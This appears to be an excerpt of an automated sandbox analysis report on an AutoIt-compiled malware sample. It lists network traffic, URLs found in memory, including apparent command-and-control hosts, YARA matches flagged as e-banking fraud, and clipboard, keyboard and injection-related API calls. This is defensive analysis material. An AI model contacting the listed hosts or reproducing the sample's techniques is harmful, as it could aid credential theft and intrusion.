                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Fri, 10 Jan 2025 17:04:42 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Fri, 10 Jan 2025 17:04:45 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Fri, 10 Jan 2025 17:04:47 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Fri, 10 Jan 2025 17:04:50 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: prevhost.exe, 00000005.00000002.3316055880.0000000005DE8000.00000004.10000000.00040000.00000000.sdmp, YZKoIsKkwLJWPq.exe, 00000006.00000002.3315842528.0000000003AB8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://pku-cs-cjw.top/o8v1/?gjR=aBBw/QY72agee
                Source: YZKoIsKkwLJWPq.exe, 00000006.00000002.3317083963.000000000583E000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.vilakodsiy.sbs
                Source: YZKoIsKkwLJWPq.exe, 00000006.00000002.3317083963.000000000583E000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.vilakodsiy.sbs/w7eo/
                Source: prevhost.exe, 00000005.00000003.2583327378.00000000080EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: prevhost.exe, 00000005.00000003.2583327378.00000000080EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: prevhost.exe, 00000005.00000003.2583327378.00000000080EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: prevhost.exe, 00000005.00000003.2583327378.00000000080EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: prevhost.exe, 00000005.00000003.2583327378.00000000080EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: prevhost.exe, 00000005.00000003.2583327378.00000000080EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: prevhost.exe, 00000005.00000003.2583327378.00000000080EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: prevhost.exe, 00000005.00000002.3314429519.0000000003244000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: prevhost.exe, 00000005.00000002.3314429519.0000000003244000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: prevhost.exe, 00000005.00000002.3314429519.0000000003244000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: prevhost.exe, 00000005.00000002.3314429519.0000000003244000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: prevhost.exe, 00000005.00000002.3314429519.0000000003244000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: prevhost.exe, 00000005.00000002.3314429519.0000000003244000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: prevhost.exe, 00000005.00000003.2577103123.00000000080C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: prevhost.exe, 00000005.00000003.2583327378.00000000080EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: prevhost.exe, 00000005.00000003.2583327378.00000000080EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: 0_2_0058EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0058EAFF
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: 0_2_0058ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0058ED6A
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: 0_2_0058EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0058EAFF
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: 0_2_0057AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_0057AA57
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: 0_2_005A9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_005A9576

                E-Banking Fraud

                barindex
                Source: Yara matchFile source: 2.2.svchost.exe.24e0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.24e0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.3314303554.0000000002F50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3315298026.0000000004E50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2392864199.00000000024E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2393158045.0000000002D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3315173119.0000000004CC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2393615856.0000000003600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3315527275.0000000002930000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Source: 4sfN3Gx1vO.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: 4sfN3Gx1vO.exe, 00000000.00000000.2057094134.00000000005D2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_8a3cfb43-7
                Source: 4sfN3Gx1vO.exe, 00000000.00000000.2057094134.00000000005D2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_b9966eb8-5
                Source: 4sfN3Gx1vO.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_fff98f22-6
                Source: 4sfN3Gx1vO.exeString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_6dcf58ab-1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0250CBE3 NtClose,2_2_0250CBE3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72B60 NtClose,LdrInitializeThunk,2_2_02F72B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_02F72C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_02F72DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F735C0 NtCreateMutant,LdrInitializeThunk,2_2_02F735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F74340 NtSetContextThread,2_2_02F74340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F74650 NtSuspendThread,2_2_02F74650
